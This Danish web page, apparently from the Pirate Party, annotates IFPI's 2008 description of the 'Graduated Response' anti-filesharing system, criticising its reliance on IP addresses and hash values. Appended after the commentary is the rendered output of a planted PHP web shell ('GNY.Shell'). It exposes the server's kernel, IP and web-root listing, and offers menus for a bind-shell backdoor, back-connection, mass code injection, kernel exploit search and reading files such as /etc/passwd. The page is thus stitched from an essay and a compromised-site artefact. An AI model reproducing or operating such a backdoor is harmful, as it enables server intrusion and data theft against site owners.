You are here

Kommenteret Redegørelse for Graduated Response-systemet

Redegørelse for Graduated Response-systemet

Nedenstående er IFPIs redegørelse for det "Graduated Response" system, de gerne vil have indført her i landet. Vores kommentarer fremtræder som denne tekst.

Igennem hele denne redegørelse forsøger IFPI at sammenblande de to begreber "bruger" og "IP-adresse". Det er helt centralt for dem at sammenblande disse to begreber, idet de alene har oplysning om en IP-adresse, og ønsker at ramme en bruger bag denne IP-adresse. Men der er ikke nødvendigvis nogen sammenhæng mellem brugere og IP-adresser, og der er ikke nogen mulighed for IFPI for at finde ud af hvilken bruger der sidder bag en given IP-adresse. Sådan fungerer internettet helt enkelt ikke. Et par danske domme har bekræftet, at man ikke kan sætte lighedstegn mellem bruger og IP-adresse.

Indledning

Til brug for det videre arbejde i møderækken om håndhævelse af ophavsretten på internettet, redegøres i det følgende for de tekniske aspekter bag en mulig løsning til bekæmpelse af ophavsretskrænkelser på internettet.

Den løsning, der er implementeret i Storbritannien, bygger på et princip der kaldes Graduated Response. Dette udtryk dækker over en automatiseret proces, der har til formål gøre rettighedshavere i stand til gradvist at sanktionere overfor internetbrugere, som systematisk foretager ophavsretskrænkelser via en række forskellige fildelingssystemer. I Storbritannien har rettighedshavere og teleselskaber, som bekendt, indgået en aftale om indførelse af en ordning, hvorefter teleselskaberne forpligter sig til at sende en meddelelse til deres kunder, hvis det konstateres og dokumenteres, at der finder ophavsretskrænkelser sted fra deres internetforbindelse. Den britiske løsning er effektueret og kører nu over en prøveperiode. Det danske IT specialistfirma DtecNet står bag udviklingen og implementeringen af det tekniske system i Storbritannien.

Vi må huske på, at "Graduated Response" blot er et pænere navn for den franske "Three strikes and you are out" model, hvor folk kan nægtes adgang til internettet efter tre gange at være beskyldt for at kopiere ulovligt - også selvom beskyldningerne ikke kan bevises i retten. Også i Storbritannien ønsker IFPI at folk skal kunne udelukkes fra internettet. Her i landet ser det ud til, at IFPI - indtil videre - er gået væk fra dette krav, idet det ifølge IFPIs talsmand Peter Schønning "forplumrer debatten".

DtecNet har udviklet software, der er i stand til at agere på fildelingssystemer på samme vilkår som almindelige brugere af de pågældende systemer. Ved at optræde som bruger på netværket, kan DtecNets software indsamle tilgængelige data om andre brugere af det pågældende fildelingssystem.

DtecNets software virker som en virtuel "agent provocateur", idet softwaren udgiver sig for at være en anden bruger på fildelingsnettet, og direkte opfordrer andre brugere til at begå ulovligheder. Dette fremgår tydeligt af analysen nedenfor. Der er brug for politisk stillingtagen til om vi vil tillade agent provocateurs i disse sager, som normalt er alt for små til at give straf, og som sjældent kan medføre et erstatningskrav på mere end få hundrede kroner. Specielt må det overvejes om man skal tillade en privat part at bruge agent provocateurs til at foranledige folk til at begå lovbrud, som denne part senere kan kræve erstatning for.

Nedenfor følger definitioner af enkelte centrale begreber og dernæst en nærmere redegørelse af de tekniske aspekter af den britiske løsning. Denne redegørelse er udarbejdet i samarbejde med DtecNet.

Definitioner

Peer-to-peer system
Et peer-to-peer system er et program og dertil hørende kommunikationsprotokol, der gør det muligt for en internetbruger at kommunikere og udveksle filer med andre brugere af det samme system via internettet. Langt hovedparten af ulovlig fildeling foregår i dag ved hjælp af peer-to-peer systemer.
Protokol
Fælles for fildelingssystemer er, at de fungerer ved hjælp af en underliggende protokol. En protokol er en kommunikationsstandard, der muliggør kommunikationen mellem brugere af det pågældende system. BitTorrent-trafik foregår eksempelvis ved hjælp af en bestemt slags protokol (BitTorrent protokollen).
Hash-værdi
En hash-værdi kan betegnes som et fingeraftryk for en bestemt samling data, og benyttes i fildelingsøjemed til at identificere og verificere hele eller dele af filer, som udveksles på netværket. Selve værdien frembringes ved at foretage en beregning hvori selve fildata indgår. Enhver fil-hash er ligeså unik som selve filen, forstået således at den mindste ændring af filens indhold, vil medføre en ændring af den tilsvarende hash-værdi.

Det er helt forkert at sammenligne en kryptografisk hash med et fingeraftryk. Hvor fingeraftryk normalt er unikke, er hash-værdier det ikke nødvendigvis. For en fil på f.eks. 700 MB (en almindelig størrelse for en spillefilm på fildelingsnet) med en given hash-værdi, findes der således et ufatteligt stort antal (langt større end antallet af atomer i hele universet) andre filer med samme hash-værdi og størrelse. Selvom en fil med en given hash-værdi er en ophavsretslig krænkelse, er de mange andre filer med samme hash-værdi det nødvendigvis ikke. Hvis en kryptografisk hash er sikker, er det korrekt, at det er meget svært (omend ikke umuligt) at ændre i filen uden at ændre filens hash-værdi. Desværre har det i de senere år vist sig at nogle af de hash-funktioner der bruges mest på fildelingsnetværk ikke er så sikre som hidtil antaget. Det gælder tildels SHA1, men især MD5, hvor det i dag er forholdsvist let at ændre i en fil uden at ændre dens MD5-hash-værdi.

Klientprogram
For at brugerne af et fildelingssystem kan kommunikere med hinanden, må de installere et såkaldt klientprogram på deres computer. Denne klient (programmet) gør det muligt for brugeren at forbinde til og kommunikere med andre brugere af fildelingssystemet, som benytter en klient, der understøtter den samme protokol.
Agentprogram
Det af DtecNet udviklede software betegnes som et agentprogram. Agentprogrammet fremstår på fildelingssystemet som et almindeligt klientprogram og andre brugere vil således ikke blive gjort særligt opmærksomme på dets tilstedeværelse, eller på nogen måde kunne skelne det fra andre almindelige klienter. Softwaren er programmeret til automatisk at indhente oplysninger om brugere og formodede krænkelser (IP-adresser, filnavne og filernes hash-værdier).

Det må her bemærkes, at en sådan automatiseret skanning af fildelingsnet strider imod brugsbetingelserne for de fleste fildelingsnetværk. Årsagen er, at en sådan skanning medfører en betydelig belastning på fildelingsnettene, med øgede omkostninger til følge. Hvis skanningen er alt for tung, kan den antage karakter af et såkaldt Denial-Of-Service angreb, og det kan derfor blive nødvendigt at overveje om vi skal tillade IFPI at bruge metoder der normalt benyttes af EDB-kriminelle til at få andres systemer til at gå ned.

Teknisk beskrivelse af systemet

Systemet bag Graduated Response består af software (agentprogrammer), der implementeres på eksisterende fildelingssystemer. Softwaren kan kommunikere med andre klientprogrammer, og er tilpasset hver enkelt protokol for de netværk, som undersøges.

Den praktiske sikring af beviser for ophavsretlige krænkelser og fremsendelse af meddelelser til indehaverne af de forbindelser, hvorfra krænkelserne er foregået, sker i tre trin.

1. Afsøgning og konstaterinq af ophavsretskrænkelser

Indledningsvist udarbejdes af rettighedshaverne lister over, hvilket materiale de besidder rettighederne til og som de ønsker skal indgå i bevissikringen på fildelingssystemerne[1]. Listerne sendes til den part, der skal forestå indsamlingen af bevismateriale vedrørende krænkelserne (i Storbritannien, DtecNet).

Det er ikke her specificeret hvilken form disse lister skal have. Af følgende afsnit kan man gætte, at der er tale om lister med titler på værker, som rettighedshavere mener at have rettighederne til. Men titler duer ikke til at identificere ophavsretsligt beskyttede værker, idet forskellige værker kan have samme titel. For eksempel findes der mere end 16 helt forskellige stykker musik med titlen "Home". Hvis man alene bruger titlen, kan man risikere (tænkt eksempel) at en person der fildeler "Home" af Rodger Waters med rettighedshavernes tilladelse uretmæssigt beskyldes for ulovligt at fildele sangen "Home" af Sheryl Crow.

Da der ikke i denne redegørelse er nogen sanktioner mod rettighedshavere der placerer værker på deres lister, som de ikke har rettighederne til, eller som de har givet tilladelse til at man må fildele, risikerer man at rettighedshavere placerer flere værker på disse lister end berettiget. Det er desværre set før i andre dele af verden. Man kan også risikere at særligt skrupelløse rettighedshavere placerer værker på deres lister, hvor rettighederne tilhører andre der ønsker værkerne spredt uden betaling, for at mindske konkurrencen fra lovlige gratis værker.

Ud fra indholdet på listerne afsøges de forskellige fildelingssystemer for at afgøre, om der findes brugere, der udbyder netop de titler, som rettighedshaverne har oplistet. Der sendes en automatisk forespørgsel på titlerne og fildelingssystemet vil herefter fortælle, hvilke IP-adresser der besidder det forespurgte materiale. Forespørgslen sendes til den server, eller anden instans i systemet, der er ansvarlig for at opbevare oplysninger om, hvilke brugere der er tilknyttet netværket. Ved hjælp af agentprogrammet opnås således kendskab til, hvilke brugere der på det givne tidspunkt tilgængeliggør ophavsretligt beskyttet materiale på det pågældende fildelingssystem.

Som tidligere nævnt kan titler ikke bruges til entydig identifikation af ophavsretsligt beskyttede værker. Det kan derfor frygtes, at de IP-adresser, som der her findes slet ikke udbyder de værker man umiddelbart formoder. Og det er derfor helt forkert at konkludere at der opnås kendskab til, hvilke brugere der på det givne tidspunkt tilgængeliggør ophavsretligt beskyttet materiale på det pågældende fildelingssystem.

Desuden er denne automatiserede forespørgsel på titler og de IP-adresser, som udbyder disse titler i strid med brugsbetingelserne på de fleste fildelingsnetværk. Der kan således være tale om, at Straffelovens §263 systematisk krænkes.

Oplysningerne (IP-adresse, filnavn, hash-værdi), der opsamles ved afsøgningen, er oplysninger, der er tilgængelige for alle brugere af systemet. Det er ikke muligt aktivt at benytte fildelingssystemet, uden samtidig at gøre disse data tilgængelige for de øvrige brugere på netværket. Det materiale (titler på film, musik, bøger osv.), som agentprogrammet kan spore, er udelukkende filer, som de enkelte brugere positivt har valgt skal være tilgængeligt for andre brugere af fildelingssystemet.

Det er ikke muligt at spore, hvilket øvrigt materiale den enkelte bruger har liggende på sin computer eller andetsteds.

Det ville nok være mere korrekt at sige at DtecNets agentprogram ikke forsøger at få disse oplysninger i dette tilfælde. Teknikken med at gå ind på en computer med en given IP-adresse for at undersøge hvad der ligger af (formodet) ophavsretsligt beskyttet materiale er ellers almindelig praksis for Dtecnet og Antipiratgruppen.

2. Verificering af krænkelserne

Når fildelingssystemet har returneret oplysninger om, hvilke brugere der udbyder de titler, der er opregnet på rettighedshavernes liste, sker der en verificering af krænkelserne.

Ved at følge ovennævnte fremgangsmåde, modtages oplysning om, fra hvilke IP-adresser det forespurgte materiale udbydes. Ved hjælp af agentprogrammet etableres dernæst en forbindelse til de forskellige brugere med de oplyste IP-adresser. Når der opnås kontakt, vil agentprogrammet foretage en bekræftelse af, at der på den pågældende IP-adresse vitterlig er installeret et klientprogram som understøtter den relevante protokol.

Efter gennemførelse af denne første verificering vil filen med det ophavsretligt beskyttede materiale, eller brudstykker af denne afhængig af den samlede datamængde, automatisk blive downloadet fra brugeren (via dennes IP-adresse). Herved verificeres det, at brugeren ikke blot er forbundet til netværket og påstår at være i besiddelse af det givne materiale, men at der også foretages overførsel af data til andre brugere på netværket.

Det er direkte usandt, når der her skrives, at man herved verificerer at der foretages overførsel af data til andre brugere. Det verificeres alene, at der foretages overførsel til rettighedshaverens repræsentant.

Hvis værket virkelig tilhører rettighedshaveren, er denne overførsel er lovlig: Den sker på direkte anmodning af rettighedshaverens repræsentant, idet fildelingsprogrammet ikke begynder at sende data før det anmodes om det. Hvis værket ikke tilhører rettighedshaveren, kan rettighedshaverens repræsentant krænke trediemands ophavsret, idet han her foretager en hel eller delvis eksemplarfremstilling uden tilladelse. Uanset hvilken af de to muligheder der er tale om, har rettighedshaverens repræsentant ikke verificeret at rettighedshaverens rettigheder er blevet krænket.

Hvis man tillader, at kun brudstykker af værket overføres, kan man for nogle fildelingsnetværk risikere, at personer der kun er i besiddelse af små fragmenter af et værk beskyldes for at gøre hele værket tilgængeligt for offentligheden.

Sideløbende med indsamlingen af data om de enkelte brugeres ulovlige aktiviteter foretages systematiske downloads af filer, indeholdende materiale som optræder på rettighedshavernes lister, fra de fildelingssystemer, som indgår i løsningen. De downloadede filer verificeres, enten manuelt ved gennemsyn, eller ved hjælp af en teknologi til automatisk genkendelse, således at deres indhold bekræftes. Ved derefter at matche hash-værdierne på de filer, der findes hos brugerne, med de downloadede og verificerede filer, kan det med fuldstændig sikkerhed dokumenteres,
at de pågældende brugere ulovligt udbyder præcis det materiale, der fremgår af rettighedshavernes lister til andre brugere af fildelingssystemet.

Bemærk at denne download af hele filer ikke sker fra den enkelte bruger (hvor man vil kunne nøjes med at downloade brudstykker), men generelt fra fildelingsnetværket.

Hvis verificeringen sker hos rettighedshaverens repræsentant er der en alvorlig risiko for at der sker fejl her. Kender DtecNet forskel på sangen "Home" af Rodger Waters og de mange andre sange med samme navn af f.eks. Sheryl Crow, Alan Jackson eller Blake Shelton? En automatiseret verifikation ved hjælp af teknologier til automatisk genkendelse er også en alvorlig fejlkilde, idet sådanne teknologier er lige så upræcise fom f.eks. teknologier til automatisk stemmegenkendelse og karaktergenkendelse (OCR).

Hvad angår hash-værdien er der også store problemer. Som beskrevet ovenfor, giver samme hash-værdi ikke sikkerhed for at der er tale om samme fil. Dokumentationen sker således ikke med "fuldstændig sikkerhed", som IFPI påstår.

Der er endnu et problem med hash-værdier: På mange fildelingsnetværk, som. f.eks. Bittorrent, får brugeren hash-værdien inden han begynder at downloade filen. En Bittorrent bruger kan således oplyse hash-værdien for en fil uden at være i besiddelse af selv det mindste fragment af filen.

3. Oplysningerne samles og sendes til teleselskabet og derefter til kunden

De oplysninger, agentprogrammet automatisk har indsamlet om krænkelserne, dvs. brugerens IP-adresse, filens navn og hash-værdi, bevissikringstidspunkt, titel og kunstnernavn for hver enkel krænkelse, indsamles og indlæses i en database eller sendes på anden måde til teleselskaberne.

Igen forsøger IFPI at sammenblande begreberne "bruger" og "IP-adresse". Det eneste IFPI har på dette tidspunkt er en IP-adresse, og de har ikke - og kan ikke få - oplysning om hvilken bruger der angiveligt har fildelt. Teleselskaberne har heller ikke oplysning om brugeren der angiveligt har fildelt - de har kun oplysning om hvem der har det pågældende teleabonnement. Det er en af grundene til at IFPI her ønsker at blande teleselskaberne ind i sagen. En anden årsag er, at IFPI ønsker at teleselskaberne skal betale regningen for det følgende, mest omkostningstunge skridt i denne redegørelse.

Ved at matche IP-adresseoplysningerne og bevissikringstidspunktet med deres egen kundedatabase, kan teleselskaberne meddele de relevante kunder, at der er konstateret og dokumenteret ophavsretskrænkelser fra deres internetforbindelse.

Teleselskaberne vedligeholder en database, som kan fortælle hvilken teleabonnent der har haft en given IP-adresse på et givet tidspunkt. Det er værd at bemærke, at denne database er lavet til brug for rent teknisk problemløsning, og således ikke konstrueret til at afgøre skyldsspørgsmål. Selvom rettighedshavere jævnligt bruger reglerne om edition til at få oplysninger fra databasen de senere bruger til retssager, har ingen dansk ret såvidt vides nogensinde taget stilling til, om databasen er brugbar til retslige spørgsmål. Det er således uklart om det er de korrekte kunder der bliver kontaktet om de påståede krænkelser.

København, den 29. august, 2008

Maria Fredenslund

[1] Her anvendes udtrykket bevissikring som dækkende den automatiske indsamling af oplysninger i forbindelse med ophavsretskrænkelser på internettet. Der er således ikke tale om bevissikring, som udtrykket anvendes i retsplejelovens kapitel 57a.

Det er vigtigt for IFPI at lægge afstand mellem den "bevissikring" de redegør for i denne redegørelse, og bevissikring som beskrevet i Retsplejelovens kapåitel 57a. Men sammenligner man de to ting ser det ikke godt ud. Der er tale om en automatiseret "ex parte" undersøgelse og bevissikring, ligesom i Retsplejelovens kapitel 57a. Men her er der betydelige fejlkilder, ligesom retsgarantierne i Retsplejeloven mangler.


Redegørelsen giver anledning til en række spørgsmål:

Er den i redegørelsen beskrevne metode i det hele taget lovlig?

Hvad med de mange fejlkilder vi har gjort opmærksom på? Er det rimeligt at sende henvendelser til private borgere om ulovligheder på et så usikkert grundlag? Hvad vil de menneskelige omkostninger være i familier der - måske uberettiget - beskyldes for at et familiemedlem har brudt loven.

Hvad vil piraternes reaktion være? Vil de for at undgå at blive ramt af metoden i højere grad bruge andres internetforbindelser? Hvordan sikrer man at en borger, hvis internetforbindelse er blevet misbrugt af en pirat ikke uretmæssigt rammes?

Hvem skal betale?

Specielt spørgsmålet om hvem der skal betale kræver et par kommentarer. IFPI ønsker at teleindustrien skal betale, og hvis det bliver tilfældet kan man risikere at antallet af henvendelser til internetbrugere bliver uforholdsmæssigt stort, da det er næsten omkostningsfrit for rettighedshaverne at bede teleselskaberne om at sende disse henvendelser. Samtidig må det formodes, at teleselskabernes omkostninger indgår i det almindelige driftsregnskab, og således væltes over på alle internetbrugerne (også dem der ikke krænker ophavsretten) i form af højere priser. IFPIs argument for at få teleindustrien til at betale er, at teleindustrien tjener penge på de af deres kunder der krænker ophavsretten. Men man kunne give samme argument for postvæsenet: De tjener også penge på de kunder der bruger post til at distribuere ulovlige kopier, og alligevel kunne ingen drømme om at bede postvæsenet om at betale. Hvis denne metode skal indføres, mener vi det er rimeligt at kræve at rettighedshaverne betaler teleindustriens omkostninger, på samme måde som man i dag kræver at rettighedshaverne betaler teleindustriens omkostninger i forbindelse med edition.


Endnu et spørgsmål er, hvorfor IFPI kalder dette "graduated response", når den eneste respons er, at personer meddeles at de har krænket ophavsretten. Det kan frygtes, at IFPI har planer om langt værre tiltag overfor formodede rettghedskrænkere, men at der ikke redegøres for disse tiltag i redegørelsen, da det kan medføre større modstand mod det de her forsøger at få indført.

Selvom det ser ud til, at IFPI - indtil videre - har taget kravet om udelukkelse fra internettet på livstid af bordet, da de mener det forplumrer debatten, kan vi fra Storbritannien se andre mere "milde" tiltag, som man kunne frygte IFPI vil have indført her i landet. Det drejer sig f.eks. om nedsættelse af internethastigheden for telekunder der er blevet beskyldt for at krænke ophavsretten, ligesom midlertidige lukninger af telekundernes forbindelser har været på tale. Vi må på det kraftigste advare mod tiltag som disse, som tillader teleindustrien ikke at levere den vare deres kunder har købt og betalt for.

GNY.Shel! Encoded v1.1 edited B.Y $c0rPi0n
  _____ _   ___     __ _____ _          _ _ 
 / ____| \ | \ \   / // ____| |        | | |
| |  __|  \| |\ \_/ /| (___ | |__   ___| | |
| | |_ | . ` | \   /  \___ \| '_ \ / _ \ | |
| |__| | |\  |  | | _ ____) | | | |  __/ | |
                          \_____|_| \_|  |_|(_)_____/|_| |_|\___|_|_|  {V1.1 edited by $c0rPi0n}
Apache/2.2.15 (CentOS). PHP/5.3.3
Kernel: Linux pet.piratpartiet.dk 2.6.32-504.23.4.el6.x86_64 #1 SMP Tue Jun 9 20:57:37 UTC 2015
x86_64
Safe-Mode: OFF (not secure)
uid=48(apache) gid=48(apache) groups=48(apache) Disabled PHP Functions: NONE
cURL: ON
Free 830.58 GB of 912.5 GB (91.02%)Server IP: 95.211.216.69 - Your IP: 207.241.229.213

/var/www/html/piratpartietdk/   drwxr-xr-x
[Home]    [Back]    [Forward]    [Up]    [Refresh]    [Search]    [Buffer]    

[String/Hash Tools]    [Processes]    [Users]    [System Information]    [SQL Manager]    [Reverse IP]    [Kernel Exploit Search]    [Execute PHP Code]    [PHP Info]
    
[PHP Tools]    [Bind Shell Backdoor]    [Back-Connection]    [Mass Code Injection]    [Exploits]    [cPanel Finder]    [RFI/LFI Finder]    [Install IP:Port Proxy]    [Install PHP Proxy]    [Suicide Script]
    
Listing folder (20 files and 9 folders):

Name [asc] Size Modify Owner/Group Perms Action
. LINK 26.09.2015 01:02:14 0/0 drwxr-xr-x [info] 
.. LINK 25.09.2015 23:34:19 0/0 drwxr-xr-x [info] 
[profiles] DIR 25.09.2015 23:37:34 0/0 drwxr-xr-x [info] 
[includes] DIR 25.09.2015 23:35:10 0/0 drwxr-xr-x [info] 
[modules] DIR 25.09.2015 23:37:08 0/0 drwxr-xr-x [info] 
[themes] DIR 25.09.2015 23:56:20 0/0 drwxr-xr-x [info] 
[misc] DIR 25.09.2015 23:35:24 0/0 drwxr-xr-x [info] 
[public_html] DIR 25.09.2015 23:37:35 0/0 drwxr-xr-x [info] 
[sites] DIR 25.09.2015 23:50:09 0/0 drwxr-xr-x [info] 
[partier_paa_sociale_medier] DIR 25.09.2015 23:37:32 0/0 drwxr-xr-x [info] 
[scripts] DIR 25.09.2015 23:37:36 0/0 drwxr-xr-x [info] 
 web.config 2 KB 25.09.2015 23:56:24 0/0 -rw-r--r-- [info] [change] [download] 
 robots.txt 1.52 KB 25.09.2015 23:37:35 0/0 -rw-r--r-- [info] [change] [download] 
 COPYRIGHT.txt 1.45 KB 25.09.2015 23:34:54 0/0 -rw-r--r-- [info] [change] [download] 
 syslog 696 B 25.09.2015 23:56:12 0/0 -rw-r--r-- [info] [change] [download] 
 CHANGELOG.txt 73.16 KB 25.09.2015 23:34:54 0/0 -rw-r--r-- [info] [change] [download] 
 README.txt 5.25 KB 25.09.2015 23:37:35 0/0 -rw-r--r-- [info] [change] [download] 
 authorize.php 6.4 KB 25.09.2015 23:34:53 0/0 -rw-r--r-- [info] [change] [download] 
 update.php 18.96 KB 25.09.2015 23:56:23 0/0 -rw-r--r-- [info] [change] [download] 
 .htaccess 5.05 KB 26.09.2015 01:02:14 0/0 -rw-r--r-- [info] [change] [download] 
 cron.php 720 B 25.09.2015 23:34:54 0/0 -rw-r--r-- [info] [change] [download] 
 MAINTAINERS.txt 8 KB 25.09.2015 23:35:11 0/0 -rw-r--r-- [info] [change] [download] 
 index.php 529 B 25.09.2015 23:35:10 0/0 -rw-r--r-- [info] [change] [download] 
 xmlrpc.php 417 B 25.09.2015 23:56:24 0/0 -rw-r--r-- [info] [change] [download] 
 INSTALL.mysql.txt 1.42 KB 25.09.2015 23:35:10 0/0 -rw-r--r-- [info] [change] [download] 
 INSTALL.pgsql.txt 1.83 KB 25.09.2015 23:35:11 0/0 -rw-r--r-- [info] [change] [download] 
 LICENSE.txt 17.67 KB 25.09.2015 23:35:11 0/0 -rw-r--r-- [info] [change] [download] 
 install.php 688 B 25.09.2015 23:35:11 0/0 -rw-r--r-- [info] [change] [download] 
 INSTALL.sqlite.txt 1.27 KB 25.09.2015 23:35:11 0/0 -rw-r--r-- [info] [change] [download] 
 UPGRADE.txt 9.42 KB 25.09.2015 23:56:24 0/0 -rw-r--r-- [info] [change] [download] 
 INSTALL.txt 17.44 KB 25.09.2015 23:35:11 0/0 -rw-r--r-- [info] [change] [download] 

  


Enter:
 
Kernel Info:

Functions
Make Dir
Go Dir


 


[ Read-Only ]


 
Aliases
Make File
Go File


 


[ Read-Only ]


 

PHP Safe-Mode Bypass (Read File)

File:

e.g.: /etc/passwd or C:\WINDOWS\system32\.SAM
PHP Safe-Mode Bypass (Directory Listing)

Dir:

e.g.: /etc/ or C:\

Search
  - regexp 

Upload
 
[ Read-Only ]

.:[ GNY.Shell Encoded v1.1 ! Stand@rd Edition | Generated in: 0.0104 ]:.